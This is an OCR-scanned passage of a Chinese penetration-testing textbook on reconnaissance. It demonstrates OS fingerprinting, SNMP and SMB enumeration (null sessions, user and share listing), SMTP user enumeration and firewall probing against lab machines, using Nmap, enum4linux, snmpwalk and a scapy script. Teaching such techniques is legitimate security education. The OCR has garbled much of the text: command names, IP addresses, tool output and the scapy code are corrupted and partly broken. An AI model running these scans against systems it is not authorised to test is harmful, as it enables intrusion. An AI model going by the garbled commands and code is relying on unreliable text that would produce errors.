是 基于 CPE 信 息 来 判断 操作 系统 的 版 本 ， 
CPE 是 一 个 国际 化 、 标 准 化 组 织 ， 不 论 是 软 
件 还 硬件 ， 通 过 CPE 分 配 一 个 编号 ， 因 此 通 
过 CPE 编 号 可 以 匹配 系统 类 型 。 

(3) xprobe2 工具 。xprobe2 是 一 个 针 
对 操作 系统 的 扫描 工具 ， 扫 描 的 结果 并 


不 是 很 准确 ， 仅 供 参考 。 具 体操 作 步 又 
如 下 : 
Eee 回 使 用 xprobe2 192.168.1.103 命 令 ， 
扫描 Windows 操 作 系统 ， 执 行 效果 如 下 图 
所 示 。 


Fas probez 192.168.1.103 


‘probe? v.6.3 Copyright (c) 2882-2885 fyodor@ogo. no, ofir@sys-security.com, medergo0o.nu 


: :bbU (Guess probability: 91%) 


probability: oy 


[2] Execurion conpleted. 


step 轩 使 用 xprobe2 工 具 扫 描 Linux 系 统 ， 执 
行 效果 如 下 图 所 示 。 


oo praBe7 Ta TOR 1 I 


probe2 v.90,3 copyright (ch 2002-2005 fyodorBogo nu，oflr8sys-5ecurlty-com，medereoeo nu 
probability: 100%) 


:100%) 
lity: 100%) 

logw) 
: 100%) 
:100%) 
:09%) 
: 109%) 
Lity: 100%) 


2. 被 动 式 扫 描 


通过 网 络 监听 、 抓 包 的 方式 收集 信 
息 ， 结 合 ARP 地 址 欺骗 (可 以 实现 端口 镜 
像 的 效果 ) 抓 取 数据 包 可 以 识别 全 网 段 系 
统 类 型 。 

使 用 Kali 系 统 中 的 一 款 被 动 扫 描 工 
具 p0f， 可 以 进行 被 动 式 扫描 。 操 作 步 又 
如 下 : 
打开 pOf 工 具 ， 默 认 开 始 监听 eth0 网 
卡 ， 执 行 效果 如 下 图 所 示 。 


00t@Rali:-# POT 
- pof 3.09b by Michal Zalewski <lcamtuf@coredump.cx> --- 

[+] Closed 1 file descriptor. 

[+] Loaded 322 signatures from '/etc/pef/pef.fp'. 

[+] Intercepting traffic on default interface 'ethe'. 

[+] Default packet filtering configured [+VLAN]. 

[+] Entered main event loop. 


stp 图 一 旦 有 数据 包 经 过 eth0 网 ee 
捕获 ， 通 过 捕获 的 数据 包 进 行 分 析 ， 

将 收集 到 的 信息 全 部 在 终端 输出 ， 信息 
还 是 比较 大 的 ， 这 里 只 截取 了 部 分 信息 ， 

如 下 图 所 示 。 通 过 分 析 这 些 信 息 ， 可 以 探 
索 主 机 的 操作 系统 类 别 。 
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FT T9258 TI0I7 = 


TSE {syn J 


= 192.158.1.161/49909 
= Linux 3.11 and newer 

luist =e 

| params = none 

| raw sig = 4:64+9:0:1460:mss*29,7:mss,sok,ts,nop,ws:df,id+:0 

1 


1-T i92.168.1.161/49968 -> 61.213.183.154/89 (http request) ]- 
1 


| client = 192.168.1.161/49969 


1 app = Safari 5.1-6 

| tang = English 

| parans = dishonest 

| raw sig = 1:Host,User-Agent,Accept=[*/+],Accept-Language=[en-Us,en; 


0.5],Accept-Encoding=[gzip, deflate], ?Cache-Control,Pragma=[no- cache| 
1 ,Connection=[keep-alive]:Accept-Charset,Keep-Alive:Mozilla/5.9 (X11; 
Linux x86 64; rv;59.6) Gecko/29169191 Firefox/60.9 


11.2.3 扫描 SNMP 


SNMP 是 简单 网 络 管理 协议 ， 使 用 的 是 
UDP 端口 中 的 161、162 端 口 ， 其 中 ， 服 务 
端 使 用 的 是 161 端 口 ， 客 户 端 使 用 的 是 162 
端口 。 通 过 SNMP 可 以 管理 网 络 中 的 交换 
机 、 服 务 器 、 防 火 墙 等 设备 ， 从 而 查看 网 
络 中 这 些 设备 的 详细 信息 。 


1. 构建 测试 环境 


这 里 采用 虚拟 机 安装 Windows XP 操作 
系统 来 进行 测试 。 如 何 安装 Windows XP 系 
统 这 里 不 做 讲解 ， 只 讲解 如 何在 Windows 
XP 系统 下 配置 SNMP。 

有 具体 的 操作 步骤 如 下 : 

[step 图 打开 控制 面板 ， 找 到 “添加 /删除 程 
序 ” 图 标 ， 如 下 图 所 示 。 


1 
Fe 添加 /一 除 程序 


[step 图 在 打开 的 “添加 或 删除 程序 ”对 话 框 
中 ， 单 击 “ 添 加 删除 Windows 组 件 ” 图 标 ， 
如 下 图 所 示 。 


C SFu¥) 


WA [ET 司 
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step 图 打开 “Windows 组 件 向 导 ” 对 话 框 ， 
双击 “管理 和 监视 工具 ”组 件 ， 如 下 图 
所 示 。 


址 件 E): 

BE TD 

避 固 页 8 目录 证 书 0.0 mm 

癌 并 管理 jm 及 nm 了 
口 涪 基 地 网 文件 和 打印 服 敌 um | 


lg Sr 和 a 
swf] mn | 
打开 “管理 和 监视 工具 ”对 话 框 ， 在 
其 中 选中 管理 和 监视 工具 的 子 组 件 列表 框 

中 两 个 选项 ， 如 下 图 所 示 。 


所 二 确 关 空 间 
本 用 万 恋 衬 间 


[eaTR 一 
ne 
管理 和 此 视 工 具 的 子 姐 件 CE) 


iw 司 


二 
描述 。 包 合 代理 程序 可 以 监视 网 络 设备 的 活动 并 且 向 网 络 控制 台 工 作 站 汇报 。 


Cj wm | 
单 击 “确定” 按钮 ， 会 提示 插入 安装 
EE 如 下 图 所 示 。 
司 
2 总 a 


| 
re 


[E55 国 插入 安装 光盘 ， 完 成 组 件 安装 ， 如 下 
图 所 示 。 


完成 “Windomws 组 件 向 导 ” 


和 已 友 功 地 元 或 了 Yindows 扑 件 辣 导 - 


诗 单 去 “ 室 碟 " 让 工 间 此 内 时- 


Ea | 
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step 国 安装 完成 后 在 服务 中 会 多 出 两 项 基于 
SNMP 的 服务 ， 如 下 图 所 示 。 

管理 此 计算 .… 
包 合 代理 各 
接收 由 本 地 
启动 你 家 许 .… 
[step 图 双击 SNMP Service， 选 择 “ 安 全 ” 
选项 卡 ， 可 以 看 到 默认 配置 是 public 并 且 
接受 来 自任 何 主机 的 SNMP 数 据 包 ， 如 下 图 
所 示 。 


手动 
已 启动 ”自动 
已 启动 手动 
已 启动 手动 


smart Card 
SNMP Service 

区 5NMP Trap Service 

嘻 55DP Discovery 5er... 


本 地 系统 
本 地 服务 
本 地 服务 


到 对 
观 | 本 好 | 饮 复 | 代理 | 陷 并 。 安全 | 你 帮 x 系 | 


ER 


-接受 团 竺 种 闭 加 一 一 
Er3 和 
poblie 人 


EL) 护 委 中 El 


人 按 妥 来自 尾 个 主 机 的 samt 煞 据 包 
一 接受 来 目 渤 此 主轴 DsNNY 多 0) 


2. onesixtyone 工 具 


onesixtyone 工 具 是 针对 SNMP 进 行 扫 
描 的 小 工具 ， 使 用 该 工具 可 以 扫描 探测 
SNMP。 具 体操 作 步 又 如 下 : 

使 用 onesixtyone 192.168.1.103 public 
命令 ， 探 测 SNMP， 如 下 图 所 示 。 


FootgBRIUIS-W Ohe5IXtyOme T92-T68T 103 PUDUIC 
Scanning 1 hosts, 1 conmunities 

192.168.1.193 [public] Hardware: xB6 Fanily 16 Modet 19 Stepping 0 AT/AT 
|cOMPATIBLE - Software: Windovs 2688 Version 5.1 (Build 2608 Uniprocessor 
Free) 


onesixtyone 工 具 支 持 字典 方式 查 
询 ， 因 此 使 用 dpkg -L onesixtyone 命 令 查 
看 它 是 否 自 带 字典 文件 ， 执 行 效果 如 下 图 
所 示 。 


root@kali:~# dpkg -L onesixtyone 
/. 

/usr 

/usr/bin 

/usr/bin/onesixtyone 

/usr/share 

/usr/share/doc 
/usr/share/doc/onesixtyone 
/usr/share/doc/onesixtyone/README 
/usr/share/doc/onesixtyone/changelog.Debian.amd64.9gz 
/usr/share/doc/onesixtyone/changelog.Debian.gz 
/usr/share/doc/onesixtyone/changelog.gz 
/usr/share/doc/onesixtyone/copyright 
/usr/share/doc/onesixtyone/dict.txt 
/usr/share/man 

/usr/share/man/manl 
/usr/share/man/manl/onesixtyone.1.gz 


step 图 如 果 使 用 字典 扫描 ， 可 以 使 用 
onesixtyone -c dirct.txt 192.168.1.103 -o 
my.log -w 100 命 令 ， 其 中 dirct 是 字典 文 


件 ，-o 是 输出 内 容 到 一 个 文件 ，-w 设 置 超时 
时 间 (单位 ms) 。 

移 注 意 : SNMP 是 明文 传输 ， 因 此 可 以 利 
用 抓 包 来 获得 目标 的 community。 


3. snmpwalk 工 具 


snmpwalk 是 一 个 通过 SNMP GET-NEXT 
类 型 PDU， 实 现 对 目标 agent 的 某 指定 MIB 
分 支 信息 进行 完整 提取 并 输出 的 工具 。 语 
法 格式 如 下 : 


snmpwalk[ 选 项 ]agent [oid] 


常用 参数 介绍 如 下 : 

e@ —h: 显示 帮助 。 

e -v1l|2c|3: 指定 SNMP 版 本 。 

e -V: 显示 当前 snmpwalk 命 令 行 

版 本 。 

e 了 : 指定 重 试 次 数 ， 默 认为 0 次 。 

e -t: 指定 每 次 请 求 的 等 待 超时 时 间 ， 

单位 s， 默 认为 3s。 

e -Cc: 指定 当 在 WALK 时 ， 如 果 发 现 

OID 负 增长 将 是 否 继续 WALK。 

使 用 snmpwalk 工 具 可 以 查看 的 信息 相 
对 比较 多 。 使 用 snmpwalk 192.168.1.103 
-c public -v 2c 命 令 ， 由 于 信息 比较 多 ， 这 
里 只 截取 了 其 中 一 部 分 作为 展示 ， 如 下 图 
所 示 。 


nily 16 Model 19 Stepping @ AT/AT| 
1 (Buitd 2600 Uniprocessor Free)" 


.1 1.3.1.1 
ks: (451478) 1:15:14.78 


3.1.2,1 
3.1.3.1 

3.1.4,1 

.3.1.5.1 = Hex-STRING: 97 E2 OA lA OE 39 39 99 = 


b 


移 提 示 : ISO 后 面 的 数字 便 是 内 部 库 的 ID 
号 ， 包 括 了 操作 系统 信息 ， 进 程 信息 、 硬 
件 信息 、MAC 地 址 、IP 地 址 等 。 


snmpwalk 工 具 还 支持 通过 内 部 库 ID 
号 的 形式 查询 ， 使 用 的 命令 为 snmpwalk -c 
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public -v 2c 192.168.1.1.133 < 具体 ID>。 常 
用 的 方法 总 结 如 下 : 

(1) 使 用 snmpwalk -v 2c -c public 192. 
168.1. 103 .1.3.6.1.2.1.25.1 命令 取得 Windows 
端的 系统 进程 用 户 数 等 ， 其 中 -v 指 版 本 ，-c 

(2) 使 用 snmpwalk -v 2c -c public 192. 
168.1. 103 .1.3.6.1.2.1.25.2.2 命令 取得 系统 
总 内 存 。 

(3) 使 用 snmpwalk -v 2c -c public 192. 
168. 1.103 hrSystemNumUsers 命令 取得 系统 
用 户 数 。 

(4) 使 用 snmpwalk -v 2c -c public 192. 
168.1. 103 .1.3.6.1.2.1.4.20 命令 取得 全 信息 。 

(5) 使 用 snmpwalk -v 2c -c public 192. 
168. 1.103 system 命令 查看 系统 信息 。 

(6) 使 用 snmpwalk -v 2c -c public 192. 
168. 1.103 ifDescr 命令 获取 网 卡 信息 。 

snmpwalk 功 能 还 有 很 多 ， 可 以 获取 
系统 各 种 信息 ， 只 要 更 改 后 面 的 信息 类 型 
即 可 ， 如 果 不 知 道 什么 类 型 ， 也 可 以 不 指 
定 ， 如 果 不 指定 将 获取 所 有 信息 。 


4. snmpcheck 工 具 


snmpwalk 显 示 的 信息 非常 多 但 是 不 易 
阅读 ， 而 snmpcheck 会 显示 具体 信息 名 称 
更 方便 使 用 者 阅读 ， 使 用 snmpcheck 要 输入 
snmpcheck 命 令 〈 直 接 输入 snmpcheck 会 出 
现 图 形 化 工具 ) 。 

使 用 snmpcheck 工 具 的 操作 步骤 如 下 : 
[step 图 使 用 snmpcheck -h 命 令 ， 打 开 帮 助 信 
息 ， 可 以 查看 参数 信息 ， 但 可 以 看 到 参数 
并 不 多 ， 如 下 图 所 示 。 


snnpcheck -nh 


eck [-x] [nlyl LN LH] [-Y NUN] [-L] L-f] Ll-al HosTS] 


Don and he 
onty cheek for thlnos 1 can Tx 
HOSTS check these hosts for problens. 


x Options 
x forces ascii bs 
start in hidder 


ee dtead of 3 
(hides 


~V NUM i ED Uewel of the command log (def: 3 
-LShow the lo 
jG Don't start by checking anything. Just bring up the interface. 
Ascii options 
Don’t ever try and | J the pr ese tou: ust ttst 
yAlways fix problem 
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[step 图 使 用 snmp-check 192.168.1.103 命 令 ， 
可 以 查看 主机 的 snmp 信 息 。 下 图 为 查询 出 
来 的 主机 系统 信息 。 


#] Systemn inTormations 


Host IP address 
Hostname : 111111-9B22E9A4 
Description : Hardware: x86 Family 16 
Model 16 Stepping 9 AT/AT COMPATIBLE - Software: Windows 
2666 Version 5.1 (Build 2669 Uniprocessor Free) 

Contact 和 克 

Location : 
Uptime snmp 


: 192.168.1.163 


: 1 day, 095:27:29.84 


Uptime system : 01:55:48.67 
System date : 2918-19-28 13:47:59.3 
Domain : WORKGROUP 


step 较 下 图 为 查询 出 来 的 用 户 信息 


[TT User accountsd 


Guest 
Administrator 
HelpAssistant 
SUPPORT 388945ag 


Estee 加 下 图 为 查询 出 来 的 网 络 信息 。 


FTNEUWOTK INTOrMaTLON: 


IP forwarding enabled : no 
Default TTL : 128 
TCP segnents received : 181 
TCP segnents sent : 231 


TCP segnents retrans :0 


Input datagrams : 6663 
Delivered datagrams : 6661 
Output datagrams : 1118 


step 较 下 图 为 查询 出 来 的 UDP 端口 开放 


信息 。 


7] Listening UDP portss 
address Locat port 
161 
162 
445 
569 
4569 
123 
1969 
123 
137 
138 
1968 


.1093 
103 
103 

-193 


11.2.4 扫描 SMP 协 议 


SMB (Server Message Block) 是 一 个 
协议 名 ， 它 被 用 于 Web 连 接 和 客户 端 与 服务 
器 之 间 的 信息 沟通 ， 其 目的 是 将 DOS 操 作 
系统 中 的 本 地 文件 接口 “中 断 13 ”改造 为 
网 络 文件 系统 。 


1. Nmap 工 具 


使 用 Nmap 工 具 可 以 扫描 SMP 协 议 ， 具 
体操 作 步 又 如 下 : 
steep 国 使 用 Nmap -vv -p139,445 192.168.1.1- 
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200 命 令 ， 可 以 扫描 一 个 网 段 中 开放 了 
139、445 端 口 的 机 器 。 扫 描 出 4 台 机 器 ， 其 
中 各 有 两 台 开 启 了 139、445 端 口 ， 如 下 图 
所 示 。 参 数 -vv 是 显示 更 加 详细 的 信息 。 


Scanning 4 hosts [2 ports/host] 
Discovered open port 445/tcp on 
Discovered open port 445/tcp on 
Discovered open port 139/tcp on 192.168.1.165 
Discovered open port 139/tcp on 192.168.1.103 
Kompleted SYN Stealth Scan at 02:57, 1.24s elapsed (8 total ports 


[step 图 下 图 为 IP 地 址 为 192.168.1.103 的 详细 
信息 。 

Nmap scan report Tor 192.168.1.163 
Host is up, received arp-response (9.999415 latency) 
Scanned at 2618-16-28 62:57:24 EDT for 23s 


192.168. 
192.168. 


1.195 
1.193 


PORT STATE SERVICE REASON 

139/tcp open netbios-ssn syn-ack ttl 128 
445/tcp open microsoft-ds syn-ack ttL 128 
MAC Address: 969:9C:29:A2:4E:97 (VMware) 


[step 图 下 图 为 IP 地 址 为 192.168.1.105 的 详细 
信息 。 
Nmap scan report for 192.168.1.165 


Host is up, received arp-response (96.09938s latency) 
Scanned at 2618-16-28 92:57:24 EDT for 23s 


PORT STATE SERVICE REASON 

139/tcp open netbios-ssn syn-ack ttL 64 
445/tcp open microsoft-ds syn-ack ttl 64 
MAC Address: 99:6C:29:FA:DD:2A_ (VMware) 


通过 TTL 信 息 可 以 区 分 出 103 是 
Windows 系 统 ，105 是 Linux/Unix 系 统 。 使 用 
Nmap 192.168.1.103 -p139,445 --script=smb- 
os-discovery.nse 命 令 ， 可 以 有 针对 性 地 进行 
扫描 ， 执 行 效果 如 下 图 所 示 。 该 命令 主要 
用 于 确认 开放 了 139、445 端 口 的 设备 是 否 为 
Windows 系 统 ， 可 以 看 到 通过 添加 脚本 ， 再 
进行 扫描 ， 信 非常 准确 了 。 


Foot@kali: -# nmap 192.168.1.103 -p139,445 --script=smb-03-discovery.ns 
Starting Mmap 7.76 ( https://nmap.org ) at 2618-19-28 63:25 EDT 

Nnap scan report for 192.168.1.103 

Host 1s up 19.69945s latency!. 


PORT 。 STATE SERVICE 
haeytcp open netbios-ssn 
445/tcp open microsoft-ds 
NAC Address: 98:BC:29:A2:4E:97 (VMwarel) 


Host script resutts: 
| smb-os-discovery: 
1 05; Windows XP (Windows 2969 LAN Manager) 
| 0S CpE: cpe:/o:nicrosoft:windows xp::- 

| conpurer nane: 111111-9b22e9a4 

| NetBI0s computer name: 111111-9B22E9A4\x60 
| workgroup: woRKGROUPAxee 

| Systen time: 2018-19-28T15:25:69+68:60 


Nnap done: 1 IP address (1 host up) scanned in 7.52 seconds 


[step 图 使 用 相同 的 脚本 对 比 扫描 Linux 系 
统 ， 同 样 可 以 扫描 出 一 些 信息 ， 如 下 图 
所 示 。 
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FatBKSUIS7IST7STare7WWaP7SCrIPTSF niap 192.168-1-165 -p139,445 -SCript=sm-05-01sCorery. nse 
Starting Nmap 7.79 ( https://nmap.org ) at 2618-19-28 93:37 EDT 

Nmap scan report for 192.168.1.165 

Host is up (9.99647s latency). 


ORT STATE SERVICE 
139/tcp open netbios-ssn 
45/tcp open microsoft-ds 
I Address: 00:0C:29:FA:DD:2A (VMware) 


ost script results: 

| smb-os-discovery: 

| 0s: Unix (Samba 3.9.29-Debian) 

| NetBIOS computer nane: 

| workgroup: WORKGROUPYXe9 

|_ system tine: 2918-10-28T03:33:28-04:96 


他 提示 : 在 Kali 系 统 中 的 usr/share/Nmap/scripts 目 录 下 存放 了 近 600 个 Nmap 的 脚本 文件 ， 
下 图 所 示 。 针 对 不 同 的 扫描 都 可 以 找到 相应 的 脚本 文件 。 


http-grep.nse nntp-ntim-info.nse 

http-headers.nse nping-brute.nse 
fp-brute.nse http-huawei-hg5xx-vuln, nse nrpe-enum. nse 
fp-ls.nse http-icloud-findnyiphone.nse ntp-info.nse 
fp-path-vutn nse http-icloud-sendnsg.nse ntp-nonlist.nse 
Tp-serverinfo.nse http-iis-short-nane-brute.nse omp2-brute.nse 
fp-shownount. nse http-lis-webdav-vuln.nse omp2-enum- targets.nse 
jp-auth.nse http-internal-ip-disclosure.nse onron-info.nse 
jp-brute.nse http-joonla-brute.nse opentookup-info.nse 
jp-headers.nse http-jsonp -detection.nse openvas-otp-brute.nse 
jp-methods .nse http-litespeed-sourcecode-download.nse openwebnet-discovery.nse 
jp- request.nse http-ls.nse oracle-brute.nse 
llseeingeye-info.nse http-najordono2-dir-traversal.nse oracle-brute-stealth.nse 
mdp-info nse LUp-matware-host ae oracte-enum-useryvnsc 
sn-query.nse http-ncnp.nse oracle-sid-brute.nse 
uth-owners.nse http-nethods.nse oracle-tns-version.nse 
uth-spoof.nse http-nethod-tanper.nse ovs-agent-version.nse 
ackorifice-brute.nse http-nobileversion-checker.nse p2p-conficker.nse 
ackorifice-info.nse http-ntln-info.nse path-mtu.nse 
acnet -info ,nse http-open-proxy.nse pcanywhere-brute.nse 
janner. nse http-open- redirect.nse peworx-info.nse 
itcoin-getaddr.nse http-passud.nse pgsql-brute.nse 


这 里 给 出 一 个 通过 脚本 扫描 ， 来 判断 主机 是 否 存 在 smb 漏 洞 ， 下 面 是 脚本 当中 给 出 的 
参考 方式 。 另 外 只 作为 测试 使 用 ， 脚 本 扫描 可 能 会 损毁 主机 系统 。 


-- Nmap --script smb-vuln-ms06-025.nse -p445 <host> 
-- Nmap -sU --script smb-vuln-ms06-025.nse -p U:137,T:139 <host> 


上 述 脚 本 中 会 有 使 用 方法 的 详细 描述 ， 除 此 之 外 还 会 给 出 该 脚本 针对 哪些 漏洞 进行 了 
扫描 。 


2. nbtscan 工 具 


使 用 nbtscan 工 具 进行 扫描 的 方法 为 : 使 用 nbtscan -r 192.168.1.0/24 命 令 进行 扫描 ， 执 
行 效果 如 下 图 所 示 。 


00t@kali: ~# nbtscan -r 192.168.1.6/24 
oing NBT name scan for addresses from 192.168.1.0/24 


P address NetBIOS Name Server User MAC address 
92.168.1.9 Sendto faile' Permission denied 

92.168.1.161 <unknown> <unknown> 

92.168.1.193 111111-9B22E9A4 <server> <unknown> 99:6c:29:a2:4e:0| 
92.168.1.195 METASPLOITABLE <server> METASPLOITABLE 99:99:99:99:69:91 


nbtscan 的 优势 在 于 如 果 网 络 防 火 墙 规则 设置 不 严谨 ， 它 可 以 实现 跨 网 段 扫描 ， 例 如 : 
主机 地 址 为 -192.168.1.101， 目 标 主机 地 址 为 -192.168.2.102， 此 时 使 用 nbtsan 可 以 实现 跨 网 
段 扫描 。 
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3. enum4linux 工 具 


使 用 enum4linux 工 具 进 行 扫描 的 操作 步骤 如 下 : 
step 国 使 用 enum4linux -a 192.168.1.103 命 令 ， 扫 描 Windows 系 统 ， 执 行 效果 如 下 图 所 示 。 


rootokall: senunalinux -a 132.168.1,103 ] 
srarting enum4tinux ve.8.9 ( http://labs.portcullis.co.uk/application/enun4linux/ ) on Sun Oct 28 64:25:64 2918 


| Targer rion | 
ITarget .192.168.1.193 

RID Range 500-559, 1369-1050 
Usernane 


Jpassword 
nown Usernam 


adninistrator, guest, krbtgt, donain admins, root, bin, none 


Et 图 在 扫描 结果 中 ， 查 询 基 于 SMP 协 议 开 启 了 哪些 服务 ， 如 下 图 所 示 。 


| Nbtstat Information for 192.168.1.193 | 


Looking up status of 192.168.1.163 


111111-9B22E96A4 <69> - B <ACTIVE> Workstation Service 
WORKGROUP <69> - <GROUP> B <ACTIVE> Domain/Workgroup Name 
111111-9B22E9A4 <20> - B <ACTIVE> File Server Service 
WORKGROUP <le> - <GROUP> B <ACTIVE> Browser Service Elections 


MAC Address = 99-9C-29-A2-4E-97 


国 使 用 enum4linux 工 具 尝 试 建立 空 连 接 ， 执 行 效果 如 下 图 所 示 。 如 果 存 在 空 连接 这 里 


+] Server 192.168.1.163 allows sessions using username '', password ' 


使 用 enum4linux 工 具 扫 描 Linux 系 统 ， 执 行 效果 如 下 图 所 示 。 


oTORaUI rH enunAlinun -a 192 168,1, 165 ] 
tarting enun4tinux ve.8,9 ( http://labs.portcullis.co.uk/application/enun4linux/ ) on Sun oct 28 94:34:13 2018 


0ssword 
nown Usernanes .. administrator, quest, krbtat, donain admins, root, bin, none 


图 去 询 殷 楷 结 果 中 ， ed sa 如 下 图 所 示 。 


Nbtstat Info rmat ion for 


METASPLOITABLE <60> <ACTIVE> Workstation Service 
METASPLOITABLE <63> <ACTIVE> Messenger Service 
METASPLOITABLE ”<29> <ACTIVE> File Server Service 


MSBROWSE . <91> - <GROUP> B <ACTIVE> Master Browser 


Looking up status of 192.168.1.165 


WORKGROUP <69> - <GROUP> B <ACTIVE> Domain/Workgroup Name 
WORKGROUP <1d> - B <ACTIVE> Master Browser 
WORKGROUP <le> - <GROUP> B <ACTIVE> Browser Service Elections 


-MAC Address = 99-99-99-99-69-09 


sep 国 查询 扫描 结果 中 ， :得 描 测 米 的 系统 信 \， 如 下 图 所 示 。 


0S information on 192.168.1.105 | 
se of uninitialized value $os info in concatenation (.) or string at ./enun4linux.pl Line 464 
+] Got 0S info for 192.168.1.195 from snbclient: 
+] Got 0S info for 192.168.1.165 from srvinfo: 

METASPLOITABLE Wk Sv PrQ Unx NT SNT metasploitable server (Samba 3.6.29-Debian) 


platforn id : 599 
os version 二 4.9 
server type Bx9a63 


[ep 图 查询 扫描 结果 中 ， 扫 描 出 来 的 用 户 相关 信息 。 这 里 只 截取 了 其 中 部 分 信息 ， 如 下 图 
所 示 。 
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x99966611 Account: games Name: games Desc: (null 
: 9x99999911 Account: nobody Name: nobody Desc: (null 
: 9x99696611 Account: bind Name: (null) Desc: (null 
: 9x96666611 Account: proxy Name: proxy Desc: (null 
: 9x96666611 Account: syslog Name: (null) Desc: (null 


index: 9x3 RID: 9x4ba 
index: 9x4 RID: 
index: 9x5 
index: 9x6 
index: 9x7 


: 9x66699911 Account: 
9x66669911 Accoun' 
:_6x69699911 Account: 


查询 扫描 结果 中 ， 设 备 开启 的 共享 ， 如 下 图 所 示 。 


www-data Name: 
root 


: 9x66699916 Account: user Name: just a user,111,, Desc: 


hi 


[FJ] Attempting to map shares on T92-168-T-T65 
//192.168.1.195/print$ Mapping: DENIED, Listing: N/A 
//192.168.1.195/tmp Mapping: OK, Listing: OK 
//192.168.1.1905/opt Mapping: DENIED, Listing: N/A 
//192.168.1.105/IPC$ [E] Can't understand response: 
NT_STATUS_ NETWORK ACCESS DENIED listing \* 
//192.168.1.105/ADMIN$ Mapping: DENIED, Listing: N/A 


Sharename Type Comment 

prints Disk Printer Drivers 

tmp Disk oh noes! 

opt Disk 

IPpC$ IPC IPC Service (metasploitable server (Samba 3.0.29-Debian) 

ADMINS IPC IPC Service (metasploitable server (Samba 3.9.29-Debian) 
Reconnecting with SMB1 for workgroup listing. 

Server Comment 

Workgroup Master 

WORKGROUP METASPLOITABLE 


step 图 查询 扫描 结果 中 ， 探 测 出 了 存在 哪些 共享 路 径 ， 哪 些 可 以 访问 ， 如 下 图 所 示 。 


侈 注意 : 在 扫描 结果 中 ， 还 有 一 些 其 他 信息 ， 这 里 不 再 一 一 列 出 。 


11.2.5 扫描 SMTP 


扫描 SMTP 最 主要 的 作用 是 发 现 目标 主机 上 的 邮件 账号 ， 通 过 主动 对 目标 的 SMTP 

(邮件 服务 器 〉 发 动 扫描 ， 发 现 可 能 存在 的 漏洞 并 收集 邮件 账号 等 信息 。 用 户 可 以 通过 抓 
包 或 者 字典 枚 举 的 方式 发 现 账号 。 
使 用 Nmap 工 具 可 以 进行 SMTP 扫 描 ， 具 体 的 方法 为 : 使 用 Nmap --script smtp-enum- 
users.nse [--script-args smtp-enum-users.methods=VRFY -p 25,465,587 192.168.1.105 命 令 ， 对 
邮件 服务 器 尝试 用 户 账号 扫描 ， 执 行 效果 如 下 图 所 示 。 


Nmap done: 1 IP address (1 host up) scanned in 1.30 seconds 


RFY -p 25,465,587 192.168.1.165 

tarting Nmap 7.79 ( https://nmap.org ) at 2918-19-28 694:58 EDT 
Failed to resolve "[--script-args". 

Failed to resolve "smtp-enum-users.methods=VRFY". 

map scan report for 192.168.1.165 

ost is up (6.99965s latency). 


PoRT 。 STATE SERVICE 

Psytcp open smtp 

| smtp-enum-users: 

| 。 Method RCPT returned a unhandled status code. 
465/tcp closed smtps 

87/tcp closed submission 

C Address: 99:6C:29:FA:DD:2A (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 6.79 seconds 


Iroot@kali:-# nmap --script smtp-enum-users.nse [--script-args smtp-enum-users.methods= 


以 上 命令 还 可 以 加 入 一 个 账号 字典 来 进行 扫描 ， 命 令 为 Nmap --script smtp-enum- 
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users.nse [--script-args smtp-enum-users. 
methods=VRFY -u user.txt-p 25,465,587 
192.168.1.105。 其 中 ，-u 参 数 指定 用 户 名 字 
典 文件 。 


11.2.6 ”探测 主机 防火 墙 


通过 对 数据 包 的 发 送 ， 并 检查 返回 
数据 包 ， 可 以 推断 出 哪些 端口 是 被 防火 墙 
过 滤 了 。 这 个 只 能 作为 一 种 推断 结果 ， 会 
存在 一 定 误差 。 探 测 规则 第 一 次 发 送 SYN 
包 ， 第 二 次 发 送 ACK 包 ， 总 体会 存在 以 下 4 
种 情况 : 

第 1 种 : 发 送 SYN 包 没有 返回 ， 发 送 
ACK 包 回复 RST， 存 在 过 滤 。 

第 2 种 : 发 送 SYN 包 回复 SYN/ACK 或 
者 SYN/RST， 发 送 ACK 包 不 回复 ， 存 在 

第 3 种 : 发 送 SYN 包 回复 SYN/ACK 或 
者 SYN/RST， 发 送 ACK 包 回复 RST， 可 能 
是 开放 状态 ， 不 存在 过 滤 。 

第 4 种 : 发 送 的 数据 包 均 无 回应 ， 端 口 
关闭 状态 。 


1. scapy 工 具 


给 出 一 段 脚本 ， 使 用 该 脚本 推断 端口 
是 否 被 防火 墙 过 滤 。 具 体 代 码 如 下 : 


#!/usr/bin/python 
from scapy.all import* 
import logging 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import* 
if lenl(sys.argv) !=3: 
print "Usage < EW detect py 
[Target IP] [Target Port]" 
print "Example 
192. 168=1.1 80” 
print"Example will perform if filtering 
exists on port 80 of host 192.168.1.1 " 
SYS .exit() 
ip = sys.argv[1]  # 获 取 IP 地 址 
port = int(sys-argv[2]) # 获 取 端 口 
# 构 建 ACK 数 据 包 
ACK_response = srl(IP(dst=ip)/TCP (dp 
ort=port,flags='A'),timeout=1,verbose=0) 


/tl Oa-pYy 


204 


# 构 建 SYN 数 据 包 
SYN response= srl(IP(dst=ip)/TCP (dpo 
rt=port,flags="'S'),timeout=1,verbose=0) 
## 如 果 RCK、SYN 包 返回 都 是 空 端口 关闭 状态 
if ((ACK response==None)and(SYN 
response==None)): 
Print"Port is either unstatefulty 
filtered or host is down" 
# 如 果 ACK 或 者 SYN 两 个 返回 值 有 一 个 为 空 ， 并 且 
不 是 两 个 返回 值 不 同时 为 空 
elif ((ACK response==None)or(SYN_ 
response==None)) and not ((ACK_ 
response==None)and (SYN_ response==None)): 
print "stateful filtering in place" 


# 存 在 过 滤 
证 
flags)==18: 坦 回复 SYNVRCK 端 口 开 放 


print "Pot is unfiltered and open" 


中 正二 下 是 二 全 起 全 芝 于 攻 二 让 瑟瑟 避 坦 二 让 全 大 < 
flags) ==20: # 回 复 RST/RCK 端 口 关闭 
print "Pont 29 nfiltered aa 
closed" 
else: 
print "Unable to determine if the 


# 其 余 情况 存在 过 滤 


port is filtered" 


2. Nmap 工 具 


使 用 Nmap 工 具 对 防火 墙 进行 扫描 ， 具 
体操 作 步 又 如 下 : 
扫描 80 端 口 ， 使 用 Nmap -sA 192. 
168.1.1 -p 80 命 令 。 执 行 效果 如 下 图 所 示 ， 
可 以 看 到 80 端 口 没有 被 过 滤 。 


FootOKaLI /Test/ Service# nmap -sA 192.168.1.1 -p 80 

Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-28 96:07 ED 
Nmap scan report for 192.168.1.1 

Host is up (6.98954s latency|. 

PoRT ”STATE SERVICE 

Be/tcp unfiltered http 

